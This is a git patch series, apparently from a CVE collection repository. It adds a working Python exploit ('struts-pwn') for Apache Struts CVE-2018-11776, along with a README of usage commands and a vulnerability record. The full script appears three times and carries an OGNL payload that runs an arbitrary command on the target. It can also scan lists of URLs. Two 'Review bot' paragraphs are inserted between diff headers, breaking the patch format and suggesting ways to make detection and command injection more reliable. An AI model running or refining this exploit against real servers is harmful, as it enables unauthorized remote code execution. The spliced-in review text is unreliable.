From 8a3f8ed13388470ef005ced2a34344e00929a576 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 06:58:47 +0000 Subject: [PATCH 001/109] add cve/apache-Struts/2018/CVE-2018. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- cve/apache-Struts/2018/CVE-2018-11776/README.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/README.md diff --git a/cve/apache-Struts/2018/CVE-2018-11776/README.md b/cve/apache-Struts/2018/CVE-2018-11776/README.md new file mode 100644 index 00000000..e69de29b From 03c517a0b5903d76bd0b2e5c3b652430476a778d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 06:59:37 +0000 Subject: [PATCH 002/109] add cve/apache-Struts/2018. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml diff --git a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml new file mode 100644 index 00000000..e69de29b From b6892e0356a1171fd5cd868e2440f22f436628a0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:02:02 +0000 Subject: [PATCH 003/109] add py MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- .../2018/CVE-2018-11776/struts-pwn.py | 226 ++++++++++++++++++ 1 file changed, 226 insertions(+) create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py diff --git a/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py b/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py new file mode 100644 index 00000000..edbf3c5f --- /dev/null 
+++ b/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py 
@@ -0,0 +1,226 @@ +#!/usr/bin/env python3 +# coding=utf-8 +# ***************************************************** +# struts-pwn: Apache Struts CVE-2018-11776 Exploit +# Author: +# Mazin Ahmed +# This code uses a payload from: +# https://github.com/jas502n/St2-057 +# ***************************************************** + +import argparse +import random +import requests +import sys +try: + from urllib import parse as urlparse +except ImportError: + import urlparse + +# Disable SSL warnings +try: + import requests.packages.urllib3 + requests.packages.urllib3.disable_warnings() +except Exception: + pass + +if len(sys.argv) <= 1: + print('[*] CVE: 2018-11776 - Apache Struts2 S2-057') + print('[*] Struts-PWN - @mazen160') + print('\n%s -h for help.' % (sys.argv[0])) + exit(0) + + +parser = argparse.ArgumentParser() +parser.add_argument("-u", "--url", + dest="url", + help="Check a single URL.", + action='store') +parser.add_argument("-l", "--list", + dest="usedlist", + help="Check a list of URLs.", + action='store') +parser.add_argument("-c", "--cmd", + dest="cmd", + help="Command to execute. (Default: 'id')", + action='store', + default='id') +parser.add_argument("--exploit", + dest="do_exploit", + help="Exploit.", + action='store_true') + + +args = parser.parse_args() +url = args.url if args.url else None +usedlist = args.usedlist if args.usedlist else None +cmd = args.cmd if args.cmd else None +do_exploit = args.do_exploit if args.do_exploit else None + +headers = { + 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', + # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', + 'Accept': '*/*' +} +timeout = 3 + + +def parse_url(url): + """ + Parses the URL. 
+ """ + + # url: http://example.com/demo/struts2-showcase/index.action + + url = url.replace('#', '%23') + url = url.replace(' ', '%20') + + if ('://' not in url): + url = str("http://") + str(url) + scheme = urlparse.urlparse(url).scheme + + # Site: http://example.com + site = scheme + '://' + urlparse.urlparse(url).netloc + + # FilePath: /demo/struts2-showcase/index.action + file_path = urlparse.urlparse(url).path + if (file_path == ''): + file_path = '/' + + # Filename: index.action + try: + filename = url.split('/')[-1] + except IndexError: + filename = '' + + # File Dir: /demo/struts2-showcase/ + file_dir = file_path.rstrip(filename) + if (file_dir == ''): + file_dir = '/' + + return({"site": site, + "file_dir": file_dir, + "filename": filename}) + + +def build_injection_inputs(url): + """ + Builds injection inputs for the check. + """ + + parsed_url = parse_url(url) + injection_inputs = [] + url_directories = parsed_url["file_dir"].split("/") + + try: + url_directories.remove("") + except ValueError: + pass + + for i in range(len(url_directories)): + injection_entry = "/".join(url_directories[:i]) + + if not injection_entry.startswith("/"): + injection_entry = "/%s" % (injection_entry) + + if not injection_entry.endswith("/"): + injection_entry = "%s/" % (injection_entry) + + injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload. 
+ injection_entry += parsed_url["filename"] + + injection_inputs.append(injection_entry) + + return(injection_inputs) + + +def check(url): + random_value = int(''.join(random.choice('0123456789') for i in range(2))) + multiplication_value = random_value * random_value + injection_points = build_injection_inputs(url) + parsed_url = parse_url(url) + print("[%] Checking for CVE-2018-11776") + print("[*] URL: %s" % (url)) + print("[*] Total of Attempts: (%s)" % (len(injection_points))) + attempts_counter = 0 + + for injection_point in injection_points: + attempts_counter += 1 + print("[%s/%s]" % (attempts_counter, len(injection_points))) + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value)) + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + continue + if "Location" in resp.headers.keys(): + if str(multiplication_value) in resp.headers['Location']: + print("[*] Status: Vulnerable!") + return(injection_point) + print("[*] Status: Not Affected.") + return(None) + + +def exploit(url, cmd): + parsed_url = parse_url(url) + + injection_point = check(url) + if injection_point is None: + print("[%] Target is not vulnerable.") + return(0) + print("[%] Exploiting...") + + payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd) + + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = 
testing_url.replace("{{INJECTION_POINT}}", payload) + + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + return(1) + + print("[%] Response:") + print(resp.text) + return(0) + + +def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): + if url: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + if usedlist: + URLs_List = [] + try: + f_file = open(str(usedlist), "r") + URLs_List = f_file.read().replace("\r", "").split("\n") + try: + URLs_List.remove("") + except ValueError: + pass + f_file.close() + except Exception as e: + print("Error: There was an error in reading list file.") + print("Exception: " + str(e)) + exit(1) + for url in URLs_List: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + print("[%] Done.") + + +if __name__ == "__main__": + try: + main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) + except KeyboardInterrupt: + print("\nKeyboardInterrupt Detected.") + print("Exiting...") + exit(0) From d1fce0f60480b6711f9f2312a57d0a0c0b8585de Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:01 +0000 Subject: [PATCH 004/109] add cve-2018-11776.py MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- .../2018/CVE-2018-11776/cve-2018-11776.py | 226 ++++++++++++++++++ 1 file changed, 226 insertions(+) create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py diff --git a/cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py b/cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py new file mode 100644 index 00000000..edbf3c5f --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py 
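Review bot: check() can report a false positive, because `random_value` is built from two random digits and so ranges over 0–99; when it is 0–3 the product searched for in the Location header is a single character (`0`, `1`, `4`, `9`) that matches almost any redirect target. Drawing the probe with `random_value = random.randint(10, 99)` keeps the product at three or more digits and removes that class of misdetection. Separately, `parse_url` takes `filename` from `url.split('/')[-1]`, so a bare `http://host` yields the hostname as the filename, and `file_path.rstrip(filename)` strips a trailing character set rather than a suffix; the intended operation is `file_path[:-len(filename)] if filename and file_path.endswith(filename) else file_path`, which also makes the "index.action" example in the comment hold for paths whose directory names share letters with the filename.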
@@ -0,0 +1,226 @@ +#!/usr/bin/env python3 +# coding=utf-8 +# ***************************************************** +# struts-pwn: Apache Struts CVE-2018-11776 Exploit +# Author: +# Mazin Ahmed +# This code uses a payload from: +# https://github.com/jas502n/St2-057 +# ***************************************************** + +import argparse +import random +import requests +import sys +try: + from urllib import parse as urlparse +except ImportError: + import urlparse + +# Disable SSL warnings +try: + import requests.packages.urllib3 + requests.packages.urllib3.disable_warnings() +except Exception: + pass + +if len(sys.argv) <= 1: + print('[*] CVE: 2018-11776 - Apache Struts2 S2-057') + print('[*] Struts-PWN - @mazen160') + print('\n%s -h for help.' % (sys.argv[0])) + exit(0) + + +parser = argparse.ArgumentParser() +parser.add_argument("-u", "--url", + dest="url", + help="Check a single URL.", + action='store') +parser.add_argument("-l", "--list", + dest="usedlist", + help="Check a list of URLs.", + action='store') +parser.add_argument("-c", "--cmd", + dest="cmd", + help="Command to execute. (Default: 'id')", + action='store', + default='id') +parser.add_argument("--exploit", + dest="do_exploit", + help="Exploit.", + action='store_true') + + +args = parser.parse_args() +url = args.url if args.url else None +usedlist = args.usedlist if args.usedlist else None +cmd = args.cmd if args.cmd else None +do_exploit = args.do_exploit if args.do_exploit else None + +headers = { + 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', + # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', + 'Accept': '*/*' +} +timeout = 3 + + +def parse_url(url): + """ + Parses the URL. 
+ """ + + # url: http://example.com/demo/struts2-showcase/index.action + + url = url.replace('#', '%23') + url = url.replace(' ', '%20') + + if ('://' not in url): + url = str("http://") + str(url) + scheme = urlparse.urlparse(url).scheme + + # Site: http://example.com + site = scheme + '://' + urlparse.urlparse(url).netloc + + # FilePath: /demo/struts2-showcase/index.action + file_path = urlparse.urlparse(url).path + if (file_path == ''): + file_path = '/' + + # Filename: index.action + try: + filename = url.split('/')[-1] + except IndexError: + filename = '' + + # File Dir: /demo/struts2-showcase/ + file_dir = file_path.rstrip(filename) + if (file_dir == ''): + file_dir = '/' + + return({"site": site, + "file_dir": file_dir, + "filename": filename}) + + +def build_injection_inputs(url): + """ + Builds injection inputs for the check. + """ + + parsed_url = parse_url(url) + injection_inputs = [] + url_directories = parsed_url["file_dir"].split("/") + + try: + url_directories.remove("") + except ValueError: + pass + + for i in range(len(url_directories)): + injection_entry = "/".join(url_directories[:i]) + + if not injection_entry.startswith("/"): + injection_entry = "/%s" % (injection_entry) + + if not injection_entry.endswith("/"): + injection_entry = "%s/" % (injection_entry) + + injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload. 
+ injection_entry += parsed_url["filename"] + + injection_inputs.append(injection_entry) + + return(injection_inputs) + + +def check(url): + random_value = int(''.join(random.choice('0123456789') for i in range(2))) + multiplication_value = random_value * random_value + injection_points = build_injection_inputs(url) + parsed_url = parse_url(url) + print("[%] Checking for CVE-2018-11776") + print("[*] URL: %s" % (url)) + print("[*] Total of Attempts: (%s)" % (len(injection_points))) + attempts_counter = 0 + + for injection_point in injection_points: + attempts_counter += 1 + print("[%s/%s]" % (attempts_counter, len(injection_points))) + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value)) + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + continue + if "Location" in resp.headers.keys(): + if str(multiplication_value) in resp.headers['Location']: + print("[*] Status: Vulnerable!") + return(injection_point) + print("[*] Status: Not Affected.") + return(None) + + +def exploit(url, cmd): + parsed_url = parse_url(url) + + injection_point = check(url) + if injection_point is None: + print("[%] Target is not vulnerable.") + return(0) + print("[%] Exploiting...") + + payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd) + + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = 
testing_url.replace("{{INJECTION_POINT}}", payload) + + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + return(1) + + print("[%] Response:") + print(resp.text) + return(0) + + +def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): + if url: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + if usedlist: + URLs_List = [] + try: + f_file = open(str(usedlist), "r") + URLs_List = f_file.read().replace("\r", "").split("\n") + try: + URLs_List.remove("") + except ValueError: + pass + f_file.close() + except Exception as e: + print("Error: There was an error in reading list file.") + print("Exception: " + str(e)) + exit(1) + for url in URLs_List: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + print("[%] Done.") + + +if __name__ == "__main__": + try: + main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) + except KeyboardInterrupt: + print("\nKeyboardInterrupt Detected.") + print("Exiting...") + exit(0) From 33150cf6ece6418690f9f6812a084abeb33cf513 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:12 +0000 Subject: [PATCH 005/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2018/CVE-2018-11776/struts-pwn.py | 226 ------------------ 1 file changed, 226 deletions(-) delete mode 100644 cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py diff --git a/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py b/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py deleted file mode 100644 index edbf3c5f..00000000 --- a/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py +++ /dev/null 
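Review bot: exploit() interpolates the raw `-c` value into the already percent-encoded OGNL payload via `.format(cmd)` inside `%27...%27`, so a space, `'`, `&`, `#` or `%` in the command either breaks the URL or the OGNL expression, and since `Runtime.exec(String)` tokenises on whitespace, pipes and redirects never work at all. Percent-encode the command before substitution (`quote(cmd, safe='')` from `urllib.parse` on the Python 3 path) and state in the `-c` help text that the command runs without a shell. This file is a byte-identical copy of struts-pwn.py from the previous patch (both carry blob edbf3c5f), and the README added later in the series still documents `python struts-pwn.py`; a `git mv` would preserve history and keep the usage text and file name in step.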
@@ -1,226 +0,0 @@ -#!/usr/bin/env python3 -# coding=utf-8 -# ***************************************************** -# struts-pwn: Apache Struts CVE-2018-11776 Exploit -# Author: -# Mazin Ahmed -# This code uses a payload from: -# https://github.com/jas502n/St2-057 -# ***************************************************** - -import argparse -import random -import requests -import sys -try: - from urllib import parse as urlparse -except ImportError: - import urlparse - -# Disable SSL warnings -try: - import requests.packages.urllib3 - requests.packages.urllib3.disable_warnings() -except Exception: - pass - -if len(sys.argv) <= 1: - print('[*] CVE: 2018-11776 - Apache Struts2 S2-057') - print('[*] Struts-PWN - @mazen160') - print('\n%s -h for help.' % (sys.argv[0])) - exit(0) - - -parser = argparse.ArgumentParser() -parser.add_argument("-u", "--url", - dest="url", - help="Check a single URL.", - action='store') -parser.add_argument("-l", "--list", - dest="usedlist", - help="Check a list of URLs.", - action='store') -parser.add_argument("-c", "--cmd", - dest="cmd", - help="Command to execute. (Default: 'id')", - action='store', - default='id') -parser.add_argument("--exploit", - dest="do_exploit", - help="Exploit.", - action='store_true') - - -args = parser.parse_args() -url = args.url if args.url else None -usedlist = args.usedlist if args.usedlist else None -cmd = args.cmd if args.cmd else None -do_exploit = args.do_exploit if args.do_exploit else None - -headers = { - 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', - # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', - 'Accept': '*/*' -} -timeout = 3 - - -def parse_url(url): - """ - Parses the URL. 
- """ - - # url: http://example.com/demo/struts2-showcase/index.action - - url = url.replace('#', '%23') - url = url.replace(' ', '%20') - - if ('://' not in url): - url = str("http://") + str(url) - scheme = urlparse.urlparse(url).scheme - - # Site: http://example.com - site = scheme + '://' + urlparse.urlparse(url).netloc - - # FilePath: /demo/struts2-showcase/index.action - file_path = urlparse.urlparse(url).path - if (file_path == ''): - file_path = '/' - - # Filename: index.action - try: - filename = url.split('/')[-1] - except IndexError: - filename = '' - - # File Dir: /demo/struts2-showcase/ - file_dir = file_path.rstrip(filename) - if (file_dir == ''): - file_dir = '/' - - return({"site": site, - "file_dir": file_dir, - "filename": filename}) - - -def build_injection_inputs(url): - """ - Builds injection inputs for the check. - """ - - parsed_url = parse_url(url) - injection_inputs = [] - url_directories = parsed_url["file_dir"].split("/") - - try: - url_directories.remove("") - except ValueError: - pass - - for i in range(len(url_directories)): - injection_entry = "/".join(url_directories[:i]) - - if not injection_entry.startswith("/"): - injection_entry = "/%s" % (injection_entry) - - if not injection_entry.endswith("/"): - injection_entry = "%s/" % (injection_entry) - - injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload. 
- injection_entry += parsed_url["filename"] - - injection_inputs.append(injection_entry) - - return(injection_inputs) - - -def check(url): - random_value = int(''.join(random.choice('0123456789') for i in range(2))) - multiplication_value = random_value * random_value - injection_points = build_injection_inputs(url) - parsed_url = parse_url(url) - print("[%] Checking for CVE-2018-11776") - print("[*] URL: %s" % (url)) - print("[*] Total of Attempts: (%s)" % (len(injection_points))) - attempts_counter = 0 - - for injection_point in injection_points: - attempts_counter += 1 - print("[%s/%s]" % (attempts_counter, len(injection_points))) - testing_url = "%s%s" % (parsed_url["site"], injection_point) - testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value)) - try: - resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - continue - if "Location" in resp.headers.keys(): - if str(multiplication_value) in resp.headers['Location']: - print("[*] Status: Vulnerable!") - return(injection_point) - print("[*] Status: Not Affected.") - return(None) - - -def exploit(url, cmd): - parsed_url = parse_url(url) - - injection_point = check(url) - if injection_point is None: - print("[%] Target is not vulnerable.") - return(0) - print("[%] Exploiting...") - - payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd) - - testing_url = "%s%s" % (parsed_url["site"], injection_point) - testing_url = 
testing_url.replace("{{INJECTION_POINT}}", payload) - - try: - resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - return(1) - - print("[%] Response:") - print(resp.text) - return(0) - - -def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): - if url: - if not do_exploit: - check(url) - else: - exploit(url, cmd) - - if usedlist: - URLs_List = [] - try: - f_file = open(str(usedlist), "r") - URLs_List = f_file.read().replace("\r", "").split("\n") - try: - URLs_List.remove("") - except ValueError: - pass - f_file.close() - except Exception as e: - print("Error: There was an error in reading list file.") - print("Exception: " + str(e)) - exit(1) - for url in URLs_List: - if not do_exploit: - check(url) - else: - exploit(url, cmd) - - print("[%] Done.") - - -if __name__ == "__main__": - try: - main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) - except KeyboardInterrupt: - print("\nKeyboardInterrupt Detected.") - print("Exiting...") - exit(0) From 9a0d8d7708ff8b54b81d1023e44e18e17dc25f9f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:24 +0000 Subject: [PATCH 006/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/apache-Struts/2018/CVE-2018-11776/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2018/CVE-2018-11776/README.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2018/CVE-2018-11776/README.md diff --git a/cve/apache-Struts/2018/CVE-2018-11776/README.md b/cve/apache-Struts/2018/CVE-2018-11776/README.md deleted file mode 100644 index e69de29b..00000000 From 500f948287a0550286caf3427e942c26c1ea9e09 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:45 +0000 Subject: [PATCH 007/109] add readme MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- .../2018/CVE-2018-11776/LICENSE.txt | 22 +++++++++ .../2018/CVE-2018-11776/README.md | 48 +++++++++++++++++++ .../2018/CVE-2018-11776/requirements.txt | 1 + 3 files changed, 71 insertions(+) create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/README.md create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/requirements.txt diff --git a/cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt b/cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt new file mode 100644 index 00000000..017f1bd2 --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt @@ -0,0 +1,22 @@ +The MIT License (MIT) + +Copyright (c) 2018 Mazin Ahmed + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + 
diff --git a/cve/apache-Struts/2018/CVE-2018-11776/README.md b/cve/apache-Struts/2018/CVE-2018-11776/README.md new file mode 100644 index 00000000..34ca25d9 --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/README.md 
@@ -0,0 +1,48 @@ +*struts-pwn - CVE-2018-11776 Exploit* +============ + +### An exploit for Apache Struts CVE-2018-11776 ### + + +# **Usage** # + +## Check if the vulnerability exists against a single URL. ## +`python struts-pwn.py --url 'http://example.com/demo/struts2-showcase/index.action'` + +## Check if the vulnerability exists against a list of URLs. ## +`python struts-pwn.py --list 'urls.txt'` + +## Exploit a single URL. ## +`python struts-pwn.py --exploit --url 'http://example.com/demo/struts2-showcase/index.action' -c 'id'` + +## Exploit a list of URLs. ## +`python struts-pwn.py --exploit --list 'urls.txt' -c 'id'` + + +# **Demo** # +![Demo](https://github.com/mazen160/public/raw/master/static/images/struts-pwn_CVE-2018-11776_Demo.gif) + +![Screenshot 1](https://github.com/mazen160/public/raw/master/static/images/struts-pwn_CVE-2018-11776_Screenshot_1.png) + +![Screenshot 2](https://github.com/mazen160/public/raw/master/static/images/struts-pwn_CVE-2018-11776_Screenshot_2.png) + + +# **Requirements** # +* Python2 or Python3 +* requests + + +# **Legal Disclaimer** # +This project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. + + +# **License** # +The project is licensed under MIT License. + + +# **Author** # +*Mazin Ahmed* +* Website: [https://mazinahmed.net](https://mazinahmed.net) +* Email: *mazin AT mazinahmed DOT net* +* Twitter: [https://twitter.com/mazen160](https://twitter.com/mazen160) +* Linkedin: [http://linkedin.com/in/infosecmazinahmed](http://linkedin.com/in/infosecmazinahmed) diff --git a/cve/apache-Struts/2018/CVE-2018-11776/requirements.txt b/cve/apache-Struts/2018/CVE-2018-11776/requirements.txt new file mode 100644 index 00000000..f2293605 --- /dev/null 
+++ b/cve/apache-Struts/2018/CVE-2018-11776/requirements.txt
@@ -0,0 +1 @@
+requests
From 77d85ad515e76c7edb87d494647011137fe3906c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?=
Date: Fri, 7 Apr 2023 07:09:19 +0000
Subject: [PATCH 008/109] update cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 李威翰
---
 .../2018/yaml/CVE-2018-11776.yaml | 20 +++++++++++++++++++
 1 file changed, 20 insertions(+)
diff --git a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml
index e69de29b..d66c1fe0 100644
--- a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml
+++ b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml
@@ -0,0 +1,20 @@
+id: CVE-2018-11776
+source: https://github.com/mazen160/struts-pwn_CVE-2018-11776
+info:
+ name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。
+ severity: high
+ description:
+ Apache Struts 版本 2.3 到 2.3.34 和 2.5 到 2.5.16 在 alwaysSelectFullNamespace 为 true 时(由用户或像 Convention 插件这样的插件)遭受可能的远程代码执行,然后: 结果在没有命名空间的情况下使用,同时,它的上层包没有或通配符命名空间,类似于结果,当使用没有设置值和操作的 url 标签时,同样的可能性同时, 它的上层包没有或通配符命名空间。
+ scope-of-influence:
+ Struts 2.3.1 - Struts 2.3.34
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-11776
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2018-11776
+ cwe-id: CWE-20
+ cnvd-id: None
+ kve-id: None
+ tags:
+ - 远程命令执行
\ No newline at end of file
From 1f303c8bb3aaeb378eed9ea18549fd09e9f2f370 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?=
Date: Fri, 7 Apr 2023 09:18:02 +0000
Subject: [PATCH 009/109] update other_list.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 李威翰
---
 other_list.yaml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/other_list.yaml b/other_list.yaml
index c9f163e3..e96035e2 100644
--- a/other_list.yaml
